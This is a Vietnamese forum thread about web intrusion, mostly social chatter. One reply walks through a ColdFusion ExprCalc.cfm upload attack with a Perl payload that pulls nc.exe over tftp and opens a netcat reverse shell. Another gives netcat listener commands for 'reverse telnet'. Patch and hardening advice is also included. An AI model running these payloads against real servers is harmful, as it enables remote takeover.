Mình có đọc qua bài viết của bạn về xâm nhập web,vậy bạn có thể cho mình hỏi vài điểm sau được chứ :
Nếu trag web không bị các lỗi như bạn nói như php va một số asp như anh frankshindong đề câp thì chúng ta có thể tấn công bằng cách khác được không ? Và như thế nào ?
Mình có nghe nói có một số lỗi như cold fusion vậy chúng là gì ?rồi irix cgi nữa ?
Và bạn có thể giải thích cho mình telnet nghịch đảo là sao không ?
Cam ơn bạn rất nhiều.

hi bạn

Q đã nói rối Q không phải là hacker gỉ hết, Q tham gia forum này là để chia sẽ và học hỏi cùng các bạn yêu thích nghanh computer mà thôi và Q không có ý tranh dua gi hết.

Những câu hỏi mà bạn đưa ra hơi nhiều cho 1 bài trả lời, Q xin được trả lời từng phần một theo sự hiểu biết của Q mà thôi, có diều gì thiếu xót xin bạn chi day thêm cho Q.
Q xin được viết 1 trong những lỗi của Cold Fusion Application Server.


Một trong những diểm yếu của Cold Fusion Application Server là. Cho phép hacker dung lệnh ( command) để thi hành điều khiển Web page từ xa.

Diểm yếu đầu tiên là ở file ấn định khi cài đặt tên là Openfile.cfm (default installation file) yếu điểm này cho phép hacker đưa (upload) file của họ tới Web server bi tấn công.
Openfile.cfm có nhiệm vụ đưa (uploading) local file đến Web Server, nhưng trên thực tế file displayopened.cfm hiển thị (display) trên Web Browse và file expercalc.cfm sẽ định giá (evaluate) nhung file upload sau dó sẽ delete nó đi.

Lợi dụng điểm yếu này Hacker thưòng làm như thế này:
Đánh cắp 1 file để chạy trên lệnh bên trong máy của Hacker (local command)
Thí du: Hacker sẽ tạo một script bằng ngôn ngữ Perl. Sau đó hacker sẽ tạo một file thí dụ là “testhack.pl”, và hacker sẽ đặt một line nào mà hacker muốn vào.

system(“tftp –i 192.168.44.50 GET nc.exe”);
system(“nc –e cmd.exe 192.168.44.50 3000”);

Sau đó hacker sẽ type vào web browser như sau để vào địa chỉ của web muốn tấn công đang dung Cold Fusion Application Server
http://192.168.44.105/cfdosc/expeval/openfile.cfm (đây là đia chỉ thí dụ không có thật)
thì trang Web sẽ co nội dung như sau:

Cold Fusion
EXPRESSION EVALUATOR

Open File

BOX : D\temp\testhack.pl
Browse
Cancel OK




Sau đó click vào nút Browse, chọn file “testhack.pl” mà hacker đã tạo để upload, click nút OK để upload. Trang Web sẽ thay đổi như sau:


Cold Fusion
EXPRESSION EVALUATOR

Use the from below to test Cold Fusion …………………………………………� �…………………………………………� ��……………………………….Read HELP for more information how to use…………effective.

BOX

system(“tftp -1 192.168.44.50 GET nc.exe&& -e……..

Open Save Email Evaluate

- sau đó ở URL hacker sẽ thay thế D:\\INETPUB\WWWROOT\cfdocs\expeval\testhack.pl
bằng file exprcalc.cfm. Sau khi thay đổi URl sẽ như sau:
http://192.168.44.105/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFilePath=D:\INETPUB\WWWROOT\cfdocs\expeval\exp rcalc.cfm

còn 4 step nửa thì chắc bạn đã biết Q không viết them…..:).



Cách phòng chống: download bản sữa lỗi của Allaire cho file expercalc.cfm ở đia chỉ này: http://www.allaire.com/handlers/index.cfm?ID=8727&Method=Full
hoặc remove script của hacker ( cách này hơi dài dòng Q xin miển viết ,dung bản sữa lỗi là tiện hơn).


Xin bạn chỉ day them cho Q

và Q cùng xin các bạn đừng tranh luận gay gắt với nhau nữa, hãy cùng nhau làm bạn, tương lai của ngành CNTT ỏVN là ở trong các bạn trẻ dam mê computer, theo Q không có 1 ngưòi nào là hoàn toàn hết, học hỏi lẫn nhau mình sẽ có thêm kiến thức rất nhiều.


Thân

vốn danh từ computer bằng tiếng Việt của Q kém lắm xin các bạn thứ lỗi cho những từ Q không biết dich sang tiếng VN

Gửi chị NhuQuynh, em có đọc một số bài viết của chị trong mục Security, thấy rất hay. Mong được học hỏi nhiều.

Em là một Web Developer nên rất quan tâm đến vấn đề bảo mật trong ứng dụng của mình, chị có thể giới thiệu một số điểm cần lưu ý khi viết các ứng dụng bằng ASP, PHP không? Hoặc có thể giới thiệu mộtr số Website nói về vấn đề này không?

Mong chị chỉ dạy :D

bmptri có thể vào 1 số trang sau để theo dõi :
www.packetstormsecurity.com
www.cgisecurity.com
http://pulhas.org/xploitsdb/Linux/index.html

Và search trên google thêm 1 ít nữa về bugtraq.

Còn 1 số site nữa nhưng K quên mất rồi.

Tôi xin nói thêm về Cold Fusion,bạn NhuQuynh đã nói rất đầy đủ tôi chỉ bổ sung thêm một chút là thêm 1 chỗ yếu nữa là : file displayopendfile.cfm cho phép hacker save file upload.Thế thôi.
Còn ve Irix CGI là lỗi xủa Irix cho phép tấn công=phê chuẩn đầu vào với các script webdist.cgi,handler,wrap thực hiện chuyển lệnh local vào script rồi yêu cầu thi hành lệnh local.Url sẽ cho phép bạn xem fle mã hoá UNIX.
Còn biện pháp đối phó thì:D để dành cho NhuQuynh và các cao thủ khác thử hén.
Bạn có hỏi về telnet nghịch đảo chứng tỏ bạn nghiên cứu khá nhiều nhỉ
:rolleyes:
Telnet nghịch đảo là một kĩ thuật cao cấp dùng để tạo cửa sau trên hệ thống =cách thực hiện chuỗi comand cung cấp diều kiện để các lần attack sau .Gọi là telnet nghịch đảo là vì nó dùng telnet để nối với cửa sổ netcat đang listen,sau đó đưa lệnh từ cửa sổ này vào luồng telnet nghịch đảo và gủi kết quả sang cửa sổ khác thôi.
Còn thực hiện thì bạn phải khởi động 2 netcat trên máy theo cú pháp :
nc -nvv -1 -p 80
nc -nvv -1 -p 25
sau đó trên target dùng lệnh Unix để lấy data từ port 25 đổ vào shell local rồi lại dẫn kết quả trở về port 80 cua hacker.
Như thế là chi tiết rùi hén , bạn có hỏi thêm gì nữa thì cứ post lên hén.
FrankShinDong.

Cám ơn Franshindong đã trả lời dùm Q :)

Cách phòng chống lỗi Irix CGI: xoá (delete) nó khỏi system của bạn, trường hợp vì lý do nào đó không thể xoá, thì apply SGI pacth ở địa chỉ này:

http://www.sgi.com/support/patch_intro.html

Cách phòng chống Reverse Telnet và Back Channels: ( q xin nói thêm là Reverse Telnet và Back channel có liên quan rất mật thiết vói nhau) đây là môt trong những yếu diểm của hê Unix
Đây là một trong những cái khó của IT security để khắc phục lỗi này, phương pháp tốt nhất là cố gắng setup những điều kiện an toàn nhất cho system mà bạn có thể làm được, bao gồm những phần sau đây :
tắt (disable) những service không cần thiết trong system của bạn và apply các patches của các công ty mà bạn đang dùng apllication của họ, càng sớm càng tốt
Xoá bỏ X (đây là một service trong các hệ Unix) ở các system mà đòi hỏi sư an toàn cao.
Nếu system dùng làm Web server có quyền hạn ưu tiên (privileges) là "nobody", thì sữa đổi permission của các binary files như là telnet để cho everyone permission không vào được các binary files và những groups quan trong ( thí dụ: chmod .... telnet). Như vậy sẽ cho phép các user account được tin tưởng được quyền thi hành nhửng command trên telnet, và loại bỏ khả năng xữ dụng telnet của các user ID không tin tưởng.
Nếu có tiền thì nên đặt thêm một Firewall ở web server hay internal system của bạn, tuy là không loại bỏ hoàn toàn khả năng tấn công của hacker, nhưng sẽ gây khó khăn hơn rất nhiều cho hacker.

Thân

Cho vikhoa phát biểu cảm nghĩ 1 chút nha :) Có cảm giác như cách nói chuyện của concaogia thấy quen lắm, không biết gặp ở đâu rồi. Chỉ có vậy thôi, còn những vấn đề khác vikhoa không biết nên không dám bàn vào.

Anh frankshindong PM hoặc mail cho em số DTDD của anh nha.

Vikhoa ---You're very intelligent lol

Không dám ! K chỉ có cảm giác vậy thôi, và có vẻ như concaogia cố tình thay đổi văn phong 1 chút. Tại sao lại làm vậy thì vikhoa cũng có thể đoán ra được và là ai thì cũng chắc được 50% :D hì hì.

Nhưng thôi, đây là tự do của mỗi người, ai muốn làm gì thì làm, miễn đừng gây hại đến người khác là được.

K nói nữa thì lạc đề mất.

Không biết có thể nhờ các cao thủ scan giùm xem diendantinhoc.com có những lỗi nào không? Vikhoa không muốn ddth.com của mình mất dữ liệu thêm 1 lần nữa đâu.

A Q xin chào anh DarkAngel..... :) (concaogia)

Nếu là anh thì không được chơi ăn gian Q đó....... :)

Q dựa vào nhũng diểm sau để suy đoán thôi nếu không đúng thì đừng cưòi Q nha....:)

Thứ nhất: hình như trong 1 bài viết nào đó, Q thấy bạn franshingdong rất nể trọng khi nói về anh.
Thứ hai: trong một bài viết gần đây mang tên concaogià (đã bị ông Boss ở đây xáo rồi) concaogia có viết 1 đoạn có lời văn như 1 bậc đàn anh với franshindong.
Thứ ba: ông boss muốn làm môt đề tài gì đó để cho forum có phần sôi động hơn và có nói vói Q là đang mời anh tham gia....:)
và concaogia vào đây đặt những câu hỏi với Q để dò xét xem sự hiểu biết của Q dến đâu....:).

Hôm bửa VK có viết với Q là làm Luư bị dể mời Kổng Minh, nói thật Q không hiểu đâu...:) Q phải hỏi bố Q đó, bây giờ thì Q đã hiểu rồi.

Nếu thật sư là anh thì theo lời mởi của VK, trong vài tuần nửa Q rảnh, Q sẽ bắt trứơc Khổng Minh làm 1 "trận đồ"....:) Q sẽ design dựa trên 2 sản phẩm mà rât đang HOT tại VN và diễn đàn này...:)
là Microsoft và Cisco ( để các bạn mới ở đây dể hiểu).
Q xin mời anh, franshingdong và các cao thủ mà VK đã mời tham gia để phá " trận đồ" của Q.

Q xin nói trước đây chỉ là học hỏi không phải lời thách thức, vì khi các bạn tấn công "trận đồ" của Q, bằng những sáng kiến riêng, là Q học hỏi được rất nhiều cho nghề nghiêp của Q.

Thân

Nếu concaogia khong phải là Drakangel thì Q thành thật xin lỗi anh nhiều

Darkangel là ai thế ? có giỏi hơn chị NhuQuynh với anh Frankshindong không ? Nghe chị NhuQuynh nói thế thì chắc sắp tới sẽ có nhiều trò chơi vui lắm nhỉ nhưng dễ thôi nhé để tụi newbie chúng em còn hiểu được nữa chứ.

chời , chắc tui phải mua cuốn " Hack and counter hack " về học gấp wé , chứ hông thì làm sao tham gia trò chơi đây , hix ...

Ở Việt nam chúng ta không có hacker mà chỉ toàn là những người đi thu thập thông tin từ internet về xong rồi làm theo những gì người ta hướng dẫn. (Rồi trong lòng tự nhủ mình cũng là hacker)

To Nhuquynh :

Khổng Minh mà K nói ở đây chính là Nhuquynh đó :) Còn anh DarkAngel thì chính là "Bàng Thống" (tính tình cổ quái hè hè).

Nếu nhuquynh rảnh thì K kiếm bộ Tam Quốc Diễn Nghĩa online cho Nhuquynh đọc nha, hay lắm đó.

Được Rồng hoặc Phượng đã yên được thiên hạ. Nay nếu DDTH được cả Rồng và Phượng thì lo gì việc xây dựng non sông.

Lại còn có thêm cả Từ Thứ (frankshindong) nữa thì quá tuyệt :D Hihi, vikhoa đang có cảm giác rất vui, rất sung sướng khi nghĩ đến chuyện mọi anh tài đều tụ họp về đây để cùng nhau "bàn luận việc ..........." (không dám nói ra), giúp cho CNTT VN phát triển về mọi mặt.

Xin lỗi nhuquynh và concaogia vì vikhoa đã xóa bài viết kia. Chủ đề đó không thích hợp lắm để tồn tại trong box này. Và vikhoa cũng đã nhờ bài viết đầu tiên đó để đoán được concaogia là ai.

Có lẽ ít người chịu để ý đến cách viết cũng như cách nói chuyện "trên mạng" của người khác. Nó mang đậm tính cách ngoài đời của họ, tuy rằng nó khác, không giống với cách nói chuyện bình thường nhưng nếu tinh ý thì cũng có thể phân biệt được người này với người kia chỉ qua những dòng chữ trên màn hình này.

Hitlermom kiếm cuốn "Hacking exposed" (nếu K nhớ không lầm) về mà nghiên cứu. Nhưng trước tiên thì phải học về IP, OSI, về các OS thật kỹ thì hãy nói chuyện về hack.

" if this book does not impress you , nothing will " <---- câu nói hay nhất trong cún Hacking exposed đó , kekekeke

nhưng níu tui nhớ hông nhầm thì cún "Hack and counter hack " bán chạy hơn đó , nhưng cái price cao wé

Mình thấy bạn blackface nói có lí lắm đó....nhưng mà thôi, mình không muốn gây thêm một trận cãi lộn nữa làm gì.

Vikhoa ở đây sướng quá ! Có đầy đủ anh tài Khổng Minh, Bàng Thống (chắc sắp chết rồi?), Từ Thứ thì ngày thâu tóm thiên hạ chắc cũng còn không xa. Chỉ cần đừng để các anh tài choảng nhau chí chóe mà hao binh tổn tướng thôi.

Trihuynh chỉ là Lý Bạch, ngày ngày uống rượu ngâm thơ nên đâu dám theo nghiệp binh đao. Trước khi kết thúc có mấy câu thơ tặng Vikhoa :

" Phượng hoàng đài thượng phượng hoàng du,
Phượng phú đài không gian tự lưu.
Ngô cung hoa thảo mai u kính
Tấn đại y quan thành cổ khâu. "

Hehe cho em hỏi chuyện ngoài lề một chút hén,Em có đọc Tam quốc nên biết Khổng Minh quân sư quạt mo,nhân vật thiên tài của tiểu thuyết nhưng em hông nhớ Bàng Thống,Từ Thứ là ai cả,họ bên phe Tào Tháo hay Lưu Bi hay Tôn Quyền thế anh Khoa ?
Trong đây thì em chỉ được hân hạnh gặp anh Frankshindong mà thôi ( và quả là lời đồn không sai -khá đẹp trai va bản lĩnh) còn chị Quynh va anh Darkangel thi em chưa được gặp,nếu được thì lần họp mặt sau các anh chị ráng tranh thủ đi chung với anh em nhé,anh em rất muốn diện kiến cao thủ như anh chị đó.
Em có nghe nói mấy anh em trong viethacker bàn tán về diendantinhoc mình và nghe đâu có người bên mình sang bên ấy chiêu dụ các admin qua đây tư vấn nếu thế thì còn gì bằng nữa.
Tướng tài đã tụ tập về đây khá nhiều và chắc trong tương lai còn nhiều nữa nên tương lai dien dan tin hoc sẽ trở thành một chiến trận thực sự,khi ấy bọn lính như tụi em sẽ có đất học hỏi và dụng võ rồi.;) Mong đàn chủ ViKhoa điều binh khiển tướng sáng suốt nhé hông thì cao thủ nào thua trận lại hận đời phá nát diendantinhoc cua minh la tiêu.

Cao thủ vẫn là cao thủ, vẫn giữ được tính cách của cao thủ. Tướng tài không bao giờ vì "bại trận" mà quay lại chém đầu thuộc hạ để trút giận.

Bàng Thống còn cao hơn Khổng Minh một bậc, trước ở Đông Ngô, sau về Lưu Bị. Trận Xích Bích có công rất lớn của Bàng Thống đó, Gia Cát chỉ "thêm gia vị" vào cho món ăn thêm đậm đà, còn Chu Du thì chẳng khác nào anh bồi bàn, chỉ biết bưng bê mà thôi. :D

Nhưng chỉ vì tính tự kiêu, không nghe lời Gia Cát, nên Phượng Sồ phải bỏ thây nơi chiến trường.

Tuy nhiên, vikhoa so sánh anh DarkAngel với Bàng Thống về "cái đầu" chứ không phải ở chi tiết trên nên mong anh đừng giận. Em không "trù" anh chết yểu đâu.

K không dám bình giảng về Tam Quốc vì tuổi đời còn quá nhỏ, không hiểu thấu sự đời. Nhưng nếu ai có nhã hứng bàn 1 chút về TQDN thì xin mở thread bên box Thư Giãn, K cũng xin hầu chuyện 1 phen.

To trihuynh : Cảm ơn Trí nhiều, rất mong Trí vẫn sát cánh với K như ngày nào :)

Cả nhuquynh và DarkAngel đều không ở VN nên khả năng gặp mặt gần như không có. Và không biết 2 người có ý định ghé về VN chơi không ? Nếu có thì xin cho vikhoa biết, sẽ ra tận sân bay để đón cho dù có bận chuyện gì đi nữa !!! (trừ chuyện đại sự của con người!)

Mình cũng có cảm giác HocGioiDaoHoa là một người quen thì phải :D

Chời chời, hai ngày không dzô diendantinhoc.com mà thấy một sự thay đổi lạ thường, tất cả các tướng tài đã có mặt. Đầu tiên là Vikhoa, trước đây em cũng không biết anh là ai. Nhưng hôm qua vớ phảo tờ báo MT cũ, chời thấy cái tên nghe quen quen. Hoá ra là anh VIkhoa nhà mình. Hơn nữa có rất nhiều người tài giỏi. Thôi thôi, bác Vikhoa cho em từ chức, em không xứng đáng danh hiệu này

Trihuynh chỉ là Lý Bạch, ngày ngày uống rượu ngâm thơ nên đâu dám theo nghiệp binh đao.

TriHuynh, hình như security không phải là lĩnh vực của bạn.
Bạn lo an phận là đúng, nhúng tay vào chuyện binh đao làm gì cho mệt.

Trihuynh "gác kiếm" đó, rồi cũng có ngày tái xuất giang hồ thôi ! Nhưng chừng nào có danh có phận, cuộc sống yên ổn thì mới lo nghiệp "binh đao" được. Phải không hả Trí ?

Neo nói security không phải lĩnh vực của Trí thì không đúng đâu :) vikhoa đã từng vừa là "học trò" vừa là "bạn học" về security và network của Trí đó.

Nếu có ai lang thang đâu đó mà thấy cái nick "tride" thì chính "hắn" đó ! hehe

chòi chòi , ghê wé ghê wé , coi bộ cao thủ đều tụ tập ở đây hít chơn . Coi bộ tui cũng phải dzìa gấp để gặp mặt bà con
tự nhiên nghĩ đến câu "hông có lửa , seo có khói " kekekkeke

Vikhoa va nhuquynh that thong minh,neu the thi tu nay toi se dung accuont nay vay.Dung la khong the qua mat duoc admin dien dan.
Nhung toi muon noi voi vikhoa la dao nay vo toi moi mo nha hang ben nay cong them con trai toi chuan bi thi university nen toi phai ban kha nhieu cong viec chac se khong the tham gia voi cac ban trong thoi gian gan duoc.
Toi cung chuan bi cho ra doi 1 cuon sach hoan toan = tieng viet duoc duc ket tu nhung nam toi hoc duoc ve sercurity day khoang 1300 trang se huong dan cac ban tat ca cac phuong phap cung nhu lo hong hien tai cua cac he thong va nhung vi du cu the de cac ban co the thuc hanh ngay tai cho.Ngoai ra toi se di kem voi tat ca cac code cu the cung bang tieng viet de cac ban de su dung va hieu duoc ro.Du kien khoang thang 12 toi se hoan thanh va se trao no lai cho vikhoa de upload cho tat ca cac anh em cung hoc hoi va cung nhau tien bo.
Mot lan cuoi cung xin chuc tat ca dat duoc uoc mo cua minh.
DarkAngel.

Cám ơn anh DarkAngel.,
Khi nào anh viết sách xong thì anh có thể email cho mọi người biết được không? À, mà anh biết về POSTFIX không? cho em hỏi vài câu? có thể email cho anh được không? Thanks

Rất cảm ơn anh DarkAngel :) Em sẽ store sách của anh và share cho tất cả những ai cần đến nó và theo đúng policy của anh đưa ra (nếu có!). Và nếu anh cho phép thì em cũng có thể publish dạng hardcopy để cho những ai không thích đọc e-books.

Hì hì, em có thông minh thì cũng chẳng "cáo già" như anh được :)

Hiện giờ gia đình anh đang ở Japan ? Nếu ở VN, có thể giới thiệu nhà hàng của vợ anh không ? Em sẽ đến ủng hộ và ...góp ý chân thành về chất lượng. :D

Thôi, không tán nhảm nữa, em đi ngủ đây. 2h sáng rồi. Lại 1 ngày mới bắt đầu.

úi trùi ui !!! toèn là kao thủ kô hè, làm seo em theo kịp mí anh đê ????
To Vikhoa: anh ui, chắc là em phải đọc sách nhiều hơn nữa rùi, nhưng không đủ finance để mua những loại sách đắt tiền đó, anh có thể chỉ cho em chổ đọc sách nào hay không, nếu được tiếng việt nữa thì càng tốt, và em cũng đang mong mỏi cuốn sách của anh DarkAngelvn wé nè, nghe mà nôn nao.
thanks

Chào các bạn,

Mình là người mới tham gia vào diễn đàn và rất quan tâm đến mục Security này.

Mình mong rằng sẽ học hỏi được nhiều điều từ các bạn ở đây, nhất là từ anh DarkAngel, chị Nhuquynh, anh frankshindong và anh vikhoa.

Anh vikhoa ơi, chừng nào có sách của anh DarkAngel thì cho em xin với nhé. Em đăng ký trước rồi đó.

Bạn nói thế la coi trọng mình quá , mình cũng giống bạn thôi cũng chỉ la đàn em xếp dưới chiếu của NhuQuynh va anh DarkAngel thôi.

Daàu tieân cho em göûi lôøi caùm ôn anh ViKhoa, anh daõ taïo ra r7oi gaëp maët cuûa caùc baäc ñaøn anh ,ñaøn chò .Nhôø ñoù maø ñaøn em tuïi em coù theå hoïc taäp ,môû mang ñöôïc kieán thöùc cuûa mình .Caùm ôn caùc anh chò nhö NhuQuynh , TriQuynh .Ffrankshindong, DarkAngelvn vaø moät soá anh chò khaùc ñaõ đ5m nhöõng kieán thöùc boå ích truyeàn thuï laïi cho tuò em . EM RA^!T VUI D(U&O&%C THAM GIA V@O DIE^$N DA@N>
Moät laàn nöõa em xin caûm ôn taát caû.

:-), Á tên mình không phải là Triquynh. Mà là Trihuynh. Họ của mình là họ Huỳnh. Nếu bạn lộn là HuynhQuynh thì hay biết mấy lol lol lol Thân !

Thành thật xin lỗi anh Trihuynh , em nhìn không rõ , em thấy Nhuquynh roi ghi Triquynh luon , nhưng Trihuynh hay Triquynh thì anh cung thật là giỏi. Em rất hâm mộ anh.

Bluesky dùng 2 nick à ? xoá bớt 1 cái đi nhé :)

Hay hay hay !VK ví anh tài Tam quốc vậy thì chúng ta thử ví xem!
Em đã biết được khổng minh và bàng thống rùi, vậy thì chu du, từ thứ, trọng đạt... là ai vậy?

Cho tui làm Tào Tháo nhen (tào tháo # đi ... nhen)

achxi@

Bài viết được gửi bởi vikhoa
Bluesky dùng 2 nick à ? xoá bớt 1 cái đi nhé :)


lam sao vikhoa biet duoc vay ?nhin duoc ip khi log on bang admin ha?lol ,vay vikhoa biet minh dùng may nick day? ;) ,just kidding ;)

To:anh traixanha, vì em dùng 2 nick đó post bài nên anh vikhoa biết đó mà (thật sự nick bluesky không phải của em..hic..hic):)